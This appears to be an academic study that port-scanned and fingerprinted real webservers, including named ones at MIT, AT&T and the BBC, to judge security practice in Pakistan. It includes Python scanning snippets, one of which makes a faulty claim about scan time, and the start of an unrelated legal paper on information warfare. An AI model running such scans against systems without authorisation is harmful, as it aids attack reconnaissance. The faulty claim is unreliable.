Very little work has been done on analyzing the information security of Pakistani organizations. To the best of my knowledge, the first study to address the need for information security in Pakistan is (Syed 1998), which argues that it is very important for Pakistan to have both offensive and defensive information warfare capabilities.

Vorakulpipat et al. have explored information security practices in Thailand and have emphasized the need to benchmark an organization's information security against best practices (Vorakulpipat 2010). Ahmad A. Abu-Musa conducted a survey to evaluate the security controls of computerized accounting information systems in Saudi organizations (Ahmad 2006). Rafael et al. surveyed three hundred IT security specialists to evaluate Canadian IT security practices (Rafael 2009). The Australian Taxation Office conducted a review of its own information security practices to prevent any potential breach of data (Australian Taxation Office 2008). The US Environmental Protection Agency conducted an audit to determine whether the Office of Administration's (OARM's) Integrated Contract Management System (ICMS) complies with Federal and Agency information system security requirements (United States Environmental Protection Agency 2006).

The related work shows that while organizations elsewhere are concerned about their already secure information systems and are working to avoid any potential attack, Pakistani organizations are putting little effort into information security, as is evident from the hacking of the websites of the Supreme Court of Pakistan, the Pakistan Navy, and many other important organizations.

3. Experimental setup

All tests were performed from the Internet using the following system and software:

Table 1: Experimental setup

Computer            Intel Pentium D, 3.2 GHz processor with 2 GB RAM
Operating System    Fedora 12 x86_64 (64-bit operating system)
Scanning Software   Nmap v5.21-1.x86_64 (a free, open-source scanner)
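Scans of this kind can be scripted for repeatability. The sketch below builds an Nmap command line approximating the "Slow Comprehensive Scan" used in the study; the exact flag set is an assumption (Zenmap's actual profile differs slightly), combining a TCP SYN scan, a UDP scan, aggressive OS/version detection, and polite timing.

```python
import shlex

def build_scan_command(target, slow=True):
    """Build an Nmap invocation roughly matching the study's
    'Slow Comprehensive Scan'.  The flag set is an assumption:
    -sS (TCP SYN scan), -sU (UDP scan), -A (OS and version
    detection), and -T2 for polite/slow timing."""
    args = ["nmap", "-sS", "-sU", "-A"]
    args.append("-T2" if slow else "-T4")
    args.append(target)
    return args

# Print a shell-safe version of the command.
cmd = build_scan_command("www.example.org")
print(" ".join(shlex.quote(a) for a in cmd))
```

Running such a scan requires root privileges for the SYN and UDP probes, which is why the study's scans took between 1,100 and 7,600 seconds per host at this timing level.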

4. Nmap port states

According to the official Nmap reference guide, the port states reported by Nmap are described as follows:

4.1 open

"An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network." (Nmap Reference Guide)

4.2 closed

"A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next." (Nmap Reference Guide)

4.3 filtered

"Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically." (Nmap Reference Guide)

4.4 unfiltered

"The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open." (Nmap Reference Guide)

4.5 open|filtered

"Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way." (Nmap Reference Guide)

4.6 closed|filtered

"This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan." (Nmap Reference Guide)
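The distinction between the open, closed, and filtered states can be illustrated with a plain TCP connect probe. This is a simplification of Nmap's SYN scan, and the three-way classification below is an assumption based on socket error behaviour: a completed connection, an immediate RST, or a silent timeout.

```python
import socket

def probe_tcp_port(host, port, timeout=2.0):
    """Classify a TCP port roughly the way Nmap does:
    a completed connection        -> 'open'
    an immediate connection reset -> 'closed'
    a timeout (probe silently dropped, as a firewall
    typically does)               -> 'filtered'"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    finally:
        s.close()
```

Note that this connect probe cannot reproduce Nmap's unfiltered or open|filtered states, which require the ACK and UDP/FIN-style scans described above.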

5. Benchmark for the analysis

The study considered the following types of organizations:

Education and research institutions
Commercial organizations
News channels

Before analyzing webservers in Pakistan, a benchmark was set using famous organizations that were assumed to be secure; the scans confirmed that they are. As the study covers three types of organizations, a benchmark was set for each of them.

5.1 Education and research organizations<br />

To set the benchmark for education and research organization, Massachusetts Institute of<br />

Technology (MIT) webserver was scanned using its domain address. The scanned results show the<br />

best security, which is very impressive and attests that highly skilled and information security aware<br />

people are working in the network.<br />

The MIT’s scan result shows that only opened ports are those that are used by webserver and they<br />

should be open for the web service, all other ports are blocked. The aggressive operating system<br />

scan reveals with 94% accuracy that FreeBSD operating system is running on the server.<br />

The scan results for MIT are shown in Table 2 to Table 4.<br />

Table 2: Scan details for MIT

Scanned Web Server     www.mit.edu (18.9.22.169)
Scan Launching Time    2010-08-14 00:50 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              2935.93 seconds
Raw packets sent       4150 (156.946KB)
Raw packets received   483 (29.058KB)

Table 3: Port scan results for MIT

Port  Protocol  State  Service
80    tcp       open   http
443   tcp       open   http
8001  tcp       open   http (probably for MIT Radio)

Table 4: Aggressive OS scan results for MIT

OS Name and Version   Type             Vendor   OS Family  OS Generation  Accuracy of result
FreeBSD 6.2-RELEASE   General Purpose  FreeBSD  FreeBSD    6.X            94%

To further strengthen the benchmark, the Indian Institute of Technology Delhi (IITD) was also analyzed, and its webserver likewise proved to be very secure. The only open ports were those used by the webserver to provide web services; all other ports in use were either protected behind a firewall or blocked. The aggressive operating system scan detected, with 86% accuracy, a firewall OS, probably running on the organization's firewall. Table 5 to Table 7 show the results for IIT Delhi, India.

Table 5: Scan details for IITD

Scanned Web Server     www.iitd.ac.in (220.227.156.20)
Scan Launching Time    2010-08-14 00:55 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              3118.12 seconds
Raw packets sent       3366 (126.658KB)
Raw packets received   1368 (69.263KB)

Table 6: Port scan results for IITD

Port  Protocol  State     Service
80    tcp       open      http
135   tcp       filtered  msrpc
139   tcp       filtered  netbios-ssn
443   tcp       open      http
445   tcp       filtered  microsoft-ds
593   tcp       filtered  http-rpc-epmap
1720  tcp       filtered  H.323/Q.931
2100  tcp       filtered  unknown
4111  tcp       filtered  unknown
4444  tcp       filtered  krb524
5060  tcp       filtered  sip

Table 7: Aggressive OS scan results for IITD

OS Name and Version                           Type      Vendor     OS Family  OS Generation         Accuracy of result
SonicWALL Aventail EX-1500 SSL VPN appliance  Firewall  SonicWALL  Embedded   No details available  86%

5.2 Commercial organizations

To set the benchmark for commercial organizations, the AT&T webserver was analyzed; our scans indicate that the server is very secure. The results show that only the ports used for web services are open and all other ports are blocked. The aggressive operating system scan shows that Linux 2.6.9 – 2.6.30 is installed on the system. Table 8 to Table 11 show the scan results for the AT&T webserver. Table 11 lists only the general-purpose OS guesses from the result, because a webserver should run a general-purpose server OS.

Table 8: Scan details for AT&T

Scanned Web Server     www.att.com (118.214.121.145)
Scan Launching Time    2010-08-14 00:51 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              2982.98 seconds
Raw packets sent       5125 (198.226KB)
Raw packets received   778 (43.980KB)

Table 9: Port scan results for AT&T

Port  Protocol  State  Service
80    tcp       open   http
443   tcp       open   https

Table 10: Aggressive OS scan results for AT&T (most probable)

OS Name and Version   Type             Vendor  OS Family  OS Generation  Accuracy of result
Linux 2.6.9 – 2.6.30  General Purpose  Linux   Linux      2.6.X          93%

Table 11: Aggressive OS scan results for AT&T (other)

Type             Vendor   OS Family  OS Generation  Accuracy of result
General Purpose  Linux    Linux      -              88%
General Purpose  Toshiba  Linux      2.4.X          88%
General Purpose  Linux    Linux      2.4.X          87%

5.3 News channels

To set the benchmark for news channels' webservers, we analyzed the BBC webserver. The only open TCP ports are those used to provide web services, although the results also show some ports in the open|filtered state, meaning the scan could not determine whether the port is open or firewalled. The SNMP port, used for managing the server, was found open. Overall, the webserver has good security. The aggressive OS scan revealed Linux 2.6.9 – 2.6.18 installed on the server. Table 12 to Table 14 show the scan results for the BBC webserver.

Table 12: Scan details for BBC

Scanned Web Server     www.bbc.co.uk (212.58.244.71)
Scan Launching Time    2010-08-14 01:01 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              1211.74 seconds
Raw packets sent       2593 (96.057KB)
Raw packets received   3662 (191.411KB)

Table 13: Port scan results for BBC

Port   Protocol  State          Service
80     tcp       open           http
135    tcp       filtered       msrpc
139    tcp       filtered       netbios-ssn
443    tcp       open           http
445    tcp       filtered       microsoft-ds
1720   tcp       filtered       H.323/Q.931
5060   tcp       filtered       sip
53     udp       open|filtered
123    udp       open|filtered
135    udp       filtered       msrpc
136    udp       filtered       profile
137    udp       filtered       netbios-ns
138    udp       filtered       netbios-dgm
139    udp       filtered       netbios-ssn
161    udp       open           snmp
445    udp       filtered       microsoft-ds
5060   udp       open|filtered
20919  udp       open|filtered

Table 14: Aggressive OS scan results for BBC

OS Name and Version   Type             Vendor  OS Family  OS Generation  Accuracy of result
Linux 2.6.9 – 2.6.18  General Purpose  Linux   Linux      2.6.X          93%

6. Analysis of webservers of Pakistan

The webservers of the most prominent Pakistani organizations were analyzed. The webservers chosen for scanning belong to organizations very similar in services and status to those used to set the benchmark. The identities of the Pakistani webservers are kept hidden because naming the organizations might harm their reputations. The trend shown is, however, very common: anyone scanning various Pakistani webservers will come to the same conclusion, and a randomly chosen organization will reveal almost the same level of security, because the study analyzed the most reputable organizations, which should be the first to implement security.

6.1 Education and research institutions

To analyze the webservers of education and research organizations, the webservers of reputable universities of the country were selected. Two webservers were scanned.

The analysis of the first webserver revealed that it is also being used as a mail server, FTP server, DNS server and database server, with the ports for all of these services open. A webserver belonging to such a large organization should serve only web content; if other services must run, they should sit behind a firewall. None of the ports was found filtered, which may mean that the organization has not installed a firewall to protect its webserver at all. A firewall does not guarantee complete security, but it is the first step in securing a server; intrusion detection and prevention should also be used to enhance security. Here the situation is worse: either no firewall has been installed, or an installed firewall is not being used to protect the server. The scan also revealed that Microsoft Windows Server 2003 SP2 is installed on the server, which, due to its extensive use, is more vulnerable to attacks than a Linux-based OS. Table 18 shows the other possibilities (Windows XP and 2000), but one can judge that they would not be installed on a webserver.
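The inference drawn above, that a complete absence of filtered ports suggests no firewall is in place, can be expressed as a simple check over scan results. The data structure below (a mapping from port/protocol pairs to Nmap state strings) is an illustrative assumption:

```python
def firewall_likely_absent(scan_results):
    """scan_results maps (port, protocol) -> Nmap state string.
    If every probed port answered 'open' or 'closed' and none was
    'filtered', every probe reached the host unimpeded, which
    suggests no packet filter sits in front of it."""
    states = set(scan_results.values())
    return bool(states) and states <= {"open", "closed"}
```

Applied to the first university server's results (Table 16, all ports open or closed), this check returns True; applied to the benchmark servers, which all show filtered ports, it returns False.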

Table 15: Scan details

Scanned Web Server     Hidden (because of possible objections)
Scan Launching Time    2010-08-14 00:49 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              4214.71 seconds
Raw packets sent       5090 (195.486KB)
Raw packets received   191 (11.459KB)

Table 16: Port scan results

Port  Protocol  State   Service
20    tcp       closed  ftp-data
21    tcp       open    ftp
25    tcp       open    smtp
26    tcp       open    smtp
53    tcp       open    domain
80    tcp       open    http
110   tcp       open    pop3
143   tcp       open    imap
443   tcp       closed  https
465   tcp       closed  smtps
995   tcp       open    pop3
1038  tcp       closed  unknown
1039  tcp       closed  unknown
1434  tcp       closed  ms-sql-m
2006  tcp       open    mysql
3306  tcp       open    mysql
3389  tcp       open    microsoft-rdp
8402  tcp       open    http
8443  tcp       open    http
53    udp       open    domain
161   udp       closed  snmp
162   udp       closed  snmptrap

Table 17: Aggressive OS scan results (most probable)

OS Name and Version                Type             Vendor     OS Family  OS Generation  Accuracy of result
Microsoft Windows Server 2003 SP2  General Purpose  Microsoft  Windows    2003           96%

Table 18: Aggressive OS scan results (other)

Type             Vendor     OS Family  OS Generation  Accuracy of result
General Purpose  Microsoft  Windows    XP             95%
General Purpose  Microsoft  Windows    2000           89%

The second webserver scanned also revealed very poor security. An SSH server listening on port 26 was found open to the Internet, which should not be the case. DNS, MySQL and the other ports detailed in Table 20 were also found open unnecessarily. Many ports are in the open|filtered state, meaning they might be open or firewalled. The webserver is therefore potentially insecure, as the port scan results readily show. The aggressive OS scan reveals, with 97% accuracy, that Linux 2.4.28 – 2.4.35 is installed on the server, and the other OS guesses also point to Linux. Such an old Linux version is a potential security threat and may not provide the required security. Scan results for this institution are shown in Table 19 to Table 22.

Table 19: Scan details

Scanned Web Server     Hidden (because of possible objections)
Scan Launching Time    2010-08-14 00:48 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              1132.40 seconds
Raw packets sent       2550 (92.637KB)
Raw packets received   4548 (237.954KB)

Table 20: Port scan results

Port   Protocol  State          Service
26     tcp       open           ssh
53     tcp       open           domain
80     tcp       open           http
111    tcp       open           rpcbind
1720   tcp       filtered       H.323/Q.931
3306   tcp       open           mysql
5060   tcp       filtered       sip
8009   tcp       open
32768  tcp       open           rpcbind
53     udp       open           domain
111    udp       open           rpcbind
135    udp       open|filtered
5003   udp       open|filtered
5060   udp       open|filtered
18676  udp       open|filtered
18818  udp       open|filtered
20279  udp       open|filtered
21454  udp       open|filtered
23176  udp       open|filtered
32768  udp       open           rpcbind
32769  udp       open|filtered
32772  udp       open|filtered
48480  udp       open|filtered
54711  udp       open|filtered
57409  udp       open|filtered
63420  udp       open|filtered

Table 21: Aggressive OS scan results (most probable)

OS Name and Version    Type             Vendor  OS Family  OS Generation  Accuracy of result
Linux 2.4.28 – 2.4.35  General Purpose  Linux   Linux      2.4.X          97%

Table 22: Aggressive OS scan results (other)

Type             Vendor    OS Family  OS Generation  Accuracy of result
General Purpose  Ubiquiti  Linux      2.4.X          95%
General Purpose  Linux     Linux      2.6.X          94%

6.2 Commercial organizations

For the commercial organizations category, the webserver scanned belongs to the organization that provides in Pakistan the same services AT&T provides in America. The organization has hundreds of millions of customers and was selected because such an organization should be among the first to implement security. The scan reveals dire results: even the telnet port is open, as well as SSH. The server is being used as an FTP, telnet, SSH, mail (SMTP, IMAP, POP3) and several other kinds of server, as the fourth column of Table 24 shows. Many ports are open on the server to provide these various services, although a webserver, at least for such a big organization, is supposed to provide only web services and should not double as any other server. The OS installed is a prerelease version of FreeBSD, which is released to find bugs; the server should run a stable OS.

Table 23: Scan details

Scanned Web Server     Hidden (because of possible objections)
Scan Launching Time    2010-08-14 00:50 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              7589.54 seconds
Raw packets sent       2387 (88.397KB)
Raw packets received   2302 (112.940KB)

Table 24: Port scan results

Port   Protocol  State          Service
21     tcp       open           ftp
22     tcp       open           ssh
23     tcp       open           telnet
25     tcp       open           smtp
80     tcp       open           http
106    tcp       open           pop3pw
110    tcp       open           pop3
143    tcp       open           imap
443    tcp       open           http
587    tcp       open           smtp
993    tcp       open           imap
995    tcp       open           pop3
1720   tcp       filtered       H.323/Q.931
3306   tcp       open           mysql
5060   tcp       filtered       sip
5190   tcp       open           smtp
8009   tcp       open           ajp13
8080   tcp       open           http
9878   tcp       open           http
514    udp       open|filtered
5060   udp       open|filtered
5632   udp       open|filtered
49169  udp       open|filtered

Table 25: Aggressive OS scan results (most probable)

OS Name and Version     Type             Vendor   OS Family  OS Generation  Accuracy of result
FreeBSD 6.3-PRERELEASE  General Purpose  FreeBSD  FreeBSD    6.X            96%

Table 26: Aggressive OS scan results (other)

Type             Vendor   OS Family  OS Generation  Accuracy of result
General Purpose  FreeBSD  FreeBSD    5.X            93%
General Purpose  FreeBSD  FreeBSD    7.X            90%
General Purpose  Apple    Mac OS X   10.4.X         89%
General Purpose  Apple    Mac OS X   10.5.X         89%
General Purpose  FreeBSD  FreeBSD    8.X            89%
General Purpose  FreeBSD  FreeBSD    5.X            89%

6.3 News channels

For this category, the webserver of the country's most widely watched and most trusted news channel was scanned. The results showed that the server is being used for many other services such as FTP, mail and DNS, as can be seen from Table 28, and many ports were found open on such a sensitive site. The aggressive OS scan shows, with 97% accuracy, that Microsoft Windows Server 2003 SP2 is installed on the server, which, due to its extensive use, is more vulnerable to attacks. The other OS guesses, shown in Table 30, would not be installed on a server system. Results are shown in Table 27 to Table 30.

Table 27: Scan details

Scanned Web Server     Hidden (because of possible objections)
Scan Launching Time    2010-08-14 01:03 PKST
Scan Type              Slow Comprehensive Scan
Scan Time              1772.15 seconds
Raw packets sent       2265 (85.521KB)
Raw packets received   2354 (117.486KB)

Table 28: Port scan results

Port  Protocol  State          Service
21    tcp       filtered       ftp
25    tcp       open           smtp
53    tcp       open           domain
80    tcp       open           http
110   tcp       open           pop3
135   tcp       open           msrpc
445   tcp       open           microsoft-ds
646   tcp       filtered       ldp
1026  tcp       open           msrpc
1027  tcp       open           msrpc
1248  tcp       open           netsaint
1433  tcp       open           ms-sql-s
1720  tcp       filtered       H.323/Q.931
3306  tcp       open           mysql
3389  tcp       open           microsoft-rdp
5060  tcp       filtered       sip
8081  tcp       open           http
8402  tcp       open           http
8443  tcp       open           http
9999  tcp       open           http
53    udp       open           domain
123   udp       open|filtered
161   udp       open|filtered
445   udp       open|filtered
500   udp       open|filtered
1028  udp       open|filtered
1434  udp       open|filtered
3456  udp       open|filtered
4500  udp       open|filtered
5060  udp       open|filtered

Table 29: Aggressive OS scan results (most probable)

OS Name and Version                Type             Vendor     OS Family  OS Generation  Accuracy of result
Microsoft Windows Server 2003 SP2  General Purpose  Microsoft  Windows    2003           97%

Table 30: Aggressive OS scan results (other)

Type             Vendor     OS Family  OS Generation  Accuracy of result
General Purpose  Microsoft  Windows    XP             91%
General Purpose  Microsoft  Windows    2000           88%
General Purpose  Microsoft  Windows    PocketPC/CE    88%

7. Conclusion and suggestions

The statistics presented show clearly that the most prominent organizations of Pakistan do not keep their webservers secure. The results reveal a large number of ports that could be used to attack the webservers; each such port is a potential avenue of attack for ill-intentioned people. The results can be compared with the benchmarks, which show very strong security. On this basis it can be inferred that if these wealthy and large organizations do not bother to invest time and money in network security, the situation at small organizations will be worse. This study is intended to give only an overview of the importance given to security in our region and is by no means a detailed security analysis of these webservers. Webservers are used merely as an index of security practices because they are the most easily accessible and among the most important resources of an organization.

All organizations whose webservers or networks are connected to the Internet should use scanners such as Nmap (which we used in this study) to find the security loopholes in their networks and then rectify them. Every organization should have a proper network security policy and should ensure that it is implemented well. Every effort should be made to make the network as secure as possible. Even the most carefully secured networks are not fully secure today, so insecure networks can present many difficulties and problems; these may not be apparent now, but insecure networks will pay the price in the future.
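As a first step, the kind of self-audit suggested above can be approximated even without Nmap by probing a list of commonly attacked ports; the port list below is an illustrative assumption drawn from the services that recur throughout this study's scans.

```python
import socket

# Ports that recur throughout the scans in this study.
COMMON_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp",
                80: "http", 110: "pop3", 443: "https",
                3306: "mysql", 3389: "rdp"}

def audit_host(host, ports=COMMON_PORTS, timeout=1.0):
    """Return the subset of `ports` accepting TCP connections.
    A real audit should use a full scanner such as Nmap; this
    plain TCP connect sweep only finds unambiguously open ports
    and cannot distinguish closed from filtered."""
    open_ports = {}
    for port, name in sorted(ports.items()):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                open_ports[port] = name
    return open_ports
```

Any port this sweep reports open, other than those serving web content, is a candidate for closing or moving behind a firewall, per the recommendation above.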

Pakistan is already suffering from terrorism: thousands of people have lost their lives and billions of dollars have been spent on the war against terrorism. Cyber terrorism is one of the next avenues terrorists can use to give a new direction to their activities. One can imagine the severe consequences if terrorists were able to exploit the webserver of a popular news channel: they could broadcast a false message about a plane crash, a bomb in a very busy place, or an attack on an active enemy of the country, among many other scenarios with very adverse effects. Pakistan, being a nuclear power, cannot afford this in any case, because it might lead to a nuclear war.

References

Ahmad A. Abu-Musa (2006), "Evaluating the Security Controls of CAIS in Developing Countries: The Case of Saudi Arabia", The International Journal of Digital Accounting Research, vol. 6, no. 11, pp. 25-64

Australian Taxation Office (2008), 'Information Security Practices Review', V2.0, [Online] Available: http://www.ato.gov.au/content/downloads/COR138560InfoSecurity.pdf [April 2008]

DawnNews (2010), 'Govt starts securing 36 hacked websites', [Online] Available: http://www.dawn.com/2010/11/30/forty-pakistan-government-websites-hacked.html [30 November 2010]

GEO Pakistan (2010), 'Supreme court website hacked', [Online] Available: http://www.geo.tv/9-30-2010/72139.htm [30 September 2010]

Jahanzaib Haque (2010), 'Cyber warfare: Indian hackers take down 36 govt websites', The Express Tribune, [Online] Available: http://tribune.com.pk/story/84269/cyber-warfare-indian-hackers-take-down-36-govtwebsites/ [01 December 2010]

Nmap Reference Guide, [Online] Available: http://nmap.org/book/man.html

PakCert (2005), 'Defacement Archive of hacked Pakistani Web Sites', Pakistan Computer Emergency Response Team, [Online] Available: http://www.pakcert.org/defaced/index.html

PakCert (2008), 'Defacement Statistics (January 1999 - August 2008)', Pakistan Computer Emergency Response Team, [Online] Available: http://www.pakcert.org/defaced/stats.html

Rafael Etges, Walid Hejazi and Alan Lefort (2009), "A Study on Canadian IT Security Practices", ISACA Journal, vol. 2, pp. 1-3, [Online] Available: http://www.isaca.org/Journal/Past-Issues/2009/Volume-2/Documents/jpdf0902-online-a-study.pdf

Syed M. Amir Husain (1998), 'Pakistan needs an Information Warfare capability', Defence Journal, [Online] Available: http://www.defencejournal.com/july98/pakneeds1.htm

The Express Tribune (2010), '36 government sites hacked by "Indian Cyber Army"', [Online] Available: http://tribune.com.pk/story/83967/36-government-websites-hacked-by-indian-cyber-army/ [30 November 2010]

Trend Micro (2009), "Data-stealing Malware on the Rise – Solutions to Keep Businesses and Consumers Safe", [Online] Available: http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/data_stealing_malware_focus_report_-_june_2009.pdf [June 2009]

United States Environmental Protection Agency – Office of Inspector General (2006), 'Information Security Series: Security Practices', Report No. 2006-P-00010, [Online] Available: http://www.epa.gov/oig/reports/2006/20060131-2006-P-00010.pdf [31 January 2006]

Vorakulpipat, C., Siwamogsatham, S. and Pibulyarojana, K. (2010), "Exploring information security practices in Thailand using ISM-Benchmark", Proceedings of Technology Management for Global Economic Growth (PICMET), 2010, pp. 1-4, 18-22 July 2010



International Legal Issues and Approaches Regarding Information Warfare

Alexandru Nitu
Romanian Intelligence Service, Bucharest, Romania
alexandru.nitu@gmail.com

Abstract: Societies and economies increasingly rely on electronic communications and are becoming more vulnerable to threats from cyberspace. At the same time, states' military and intelligence organizations are increasingly developing the capability to attack and defend computer systems. The progress of information technology makes it possible for adversaries to attack each other in new ways, inflicting new forms of damage; technological change enables cyberwarfare acts that do not fit within existing legal categories, or that may reveal contradictions among existing legal principles. The paper examines the relationship between information warfare and the law, especially international law and the law of war, as it is apparent that some fundamental questions regarding this new and emerging type of security threat need to be explored. For example, what types of activities between nation states could or should be called information warfare? What are ‘force’, ‘armed attack’, or ‘armed aggression’ (terms from the UN Charter) in the Information Age, and do they equate to information warfare? Information warfare is neither ‘armed’ in the traditional sense, nor does it necessarily involve conflict, so an important issue is whether ‘war’ between states necessarily requires physical violence, kinetic energy, and human casualties. A threshold question that arises from the development of information warfare techniques is thus a definitional one: has the development of information warfare technology and techniques taken information warfare outside the existing legal definition of war? Characteristics of information technology and warfare pose problems for those who would use international law to limit information warfare, and leave legal space for those who would wage such warfare. Consequently, there may be confusion over what limits apply to the conduct of information warfare and over when information warfare attacks may be carried out. The prospect of new technological attacks poses problems for international law because law is inherently conservative. From this point of view, the paper examines how the law itself might change in response to the fast development of information technology, and how long-established legal principles such as national sovereignty and the inviolability of national borders will be affected by the ability of cyberspace to transcend such concepts.

Keywords: international law, information warfare, use of force, Charter of the United Nations, Geneva Conventions

1. Introduction

The intensive development of information and communication technologies and their wide use in all spheres of human activity have accelerated post-industrial development and the building of a global information society, becoming a driving force for social development. The global information infrastructure provides unprecedented opportunities for communication among people, for their socialization and for access to information. Individuals, societies and states depend on the stability and reliability of the information infrastructure.

Computers and computer networks have become increasingly integral to government, military, and civilian functions. They allow instant communication and provide platforms on which business and government alike can operate. Computers now control both military and civilian infrastructures, including nuclear arsenals, telecommunication networks, electrical power systems, water supplies, oil storage facilities, financial systems, and emergency services.

As the worldwide explosion of information technology (IT) is changing the ways that business, government, and education are conducted, it also promises to change the way wars are waged. The development of information technology makes it possible for adversaries to attack each other in new ways and to inflict new forms of damage, and may create new targets for attack. Attackers may use international networks to damage or disrupt enemy systems without ever physically entering the enemy's country.

Information technologies enable a fundamentally new and effective means to disrupt or destroy a country's industry, economy, social infrastructure and public administration. They have the potential to be a means of combat capable of achieving goals related to inter-state confrontation at the tactical, operational and strategic levels. Whatever the development and diffusion of information technology mean for the future of warfare, it is apparent that many of the new forms of attack that information technology enables are qualitatively different from prior forms of attack. The use of such tools as computer intrusion and computer viruses, for example, takes war out of the physical, kinetic world and brings it into an intangible, electronic one. Effects previously attainable only through physical destruction are now accomplished remotely with the silent means of information technology.

These new ways of fighting have been labeled Information Warfare (IW). Definitions and conceptions of IW are numerous, but generally entail preserving one’s own information and information technology while exploiting, disrupting, or denying the use of an adversary’s (Shackelford 2009). In US military doctrine, IW is part of a much larger strategic shift named Information Operations (IO). Information Operations involve actions taken to affect adversary information and information systems while defending one’s own information and information systems. They apply across all phases of an operation, throughout the range of military operations, and at every level of war. Information Warfare is Information Operations conducted during time of crisis or conflict, including war, to achieve or promote specific objectives over a specific adversary or adversaries (Joint Chiefs of Staff 1998).

The new vulnerabilities that the information age generates are most likely to be exploited by opponents of developed states who cannot hope to prevail on the battlefield, or even at the negotiating table. A lesser-advantaged state hoping to seriously harm a dominant adversary must inevitably compete asymmetrically. It must seek to counter the strengths of the opponent not head-on, but rather by employing unorthodox means to strike at centers of gravity.

IW offers such asymmetrical benefits. In the first place, in many cases a computer network attack will either not merit a response involving the use of force, or the legality of such a response will be debatable, even if the victim is able to accurately identify the attack and its source. Thus, because of the potentially grave impact of cyber attacks on a state’s infrastructure, IW can prove a high-gain, low-risk option for a state outclassed militarily or economically. Moreover, to the extent that an opponent is militarily and economically advantaged, it is probably technologically dependent and, therefore, teeming with tempting targets.

2. IW and the ‘use of force’ concept

Several rules govern when force can be used (the jus ad bellum, which focuses on the criteria for going to war, covering issues such as right purpose, duly constituted authority and last resort) and how states can use that force in an armed conflict (the jus in bello or ‘law of war’, which creates the concept of just war-fighting, covering discrimination, proportionality, humanity, etc.). These rules have diverse sources, including the U.N. Charter, international humanitarian law treaties such as the 1949 Geneva Conventions, and customary international humanitarian law. Some of these existing laws involve principles of general applicability that could encompass IW. Nevertheless, the gap between physical weaponry (whether kinetic, biological, or chemical) and IW’s virtual methods can be substantial, creating translation problems.

The sort of intangible damage that IW attacks may cause is analytically different from the physical damage caused by the use of armed force in traditional warfare. The kind of destruction that bombs and bullets cause is easy to see and understand, and fits well within longstanding views of what war means. In contrast, the disruption of information systems, including the corruption or manipulation of stored or transmitted data, may cause intangible damage, such as disruption of civil society or government services. These may be more closely equivalent to activities such as economic sanctions, which may be undertaken in times of peace, than to acts of aggression (Greenberg 1998).

Whether or not an information warfare attack can be considered ‘use of force’ or ‘aggression’ is relevant to whether a forceful response can be justified as self-defense, as well as to the issue of whether a particular response would be proportionate to the original attack.

Modern law on the use of force is based on the U.N. Charter. An analysis of international law and IW could begin with the prohibition of the use of force in Article 2(4): ‘All Members shall refrain in their international relations from the threat or use of force against the territorial integrity or political independence of any state, or in any other manner inconsistent with the Purposes of the United Nations’ (Charter of the United Nations, Art. 2(4)). The drafters intended to prohibit all types of force, except those carried out under the aegis of the United Nations or as provided for by the Security Council, and wanted to restrict the use of force severely by sharply limiting its use to situations approved by the Security Council (Barkham 2001).


The fact is that neither the Charter nor any international body has clearly defined the term ‘use of force’. That might be the main reason why the prohibition on the use of force encounters difficulty when translated into the IW context. Not all hostile acts are uses of force. Traditionally, states defined ‘force’ in terms of the instrument used, including ‘armed’ force within the prohibition but excluding economic and political forms of coercion. This distinction reflects an effort to proscribe those acts most likely to interfere with the U.N.’s primary purpose: maintaining international peace and security.

The classic ‘instrumentality’ approach argues that IW does not qualify as armed force because it lacks the physical characteristics associated with military coercion (Hollis 2007). The analysis looks at whether there is kinetic impact: some type of explosion or physical force. The Charter was created in the days of weapons that produced blast, heat, and fragmentation damage, so it is clear that these types of kinetic weapons were the ones present in the minds of the drafters.

Still, some types of cyber attacks can be determined to be uses of force. Since the determination of a use of force requires that a weapon be used, there first must be a method of analogizing IW attacks to weapons. A very good method could be the one proposed by Ian Brownlie, which shifts the traditional use of force analysis from a purely kinetic analysis, based on physical force being applied to the target, to a result-based analysis, so that evaluating IW attacks is not limited to focusing on the method of the attack (Brownlie 1963). A result-based analysis looks at whether there is a kinetic result that causes damage or injury, rather than at whether the weapon itself is kinetic.

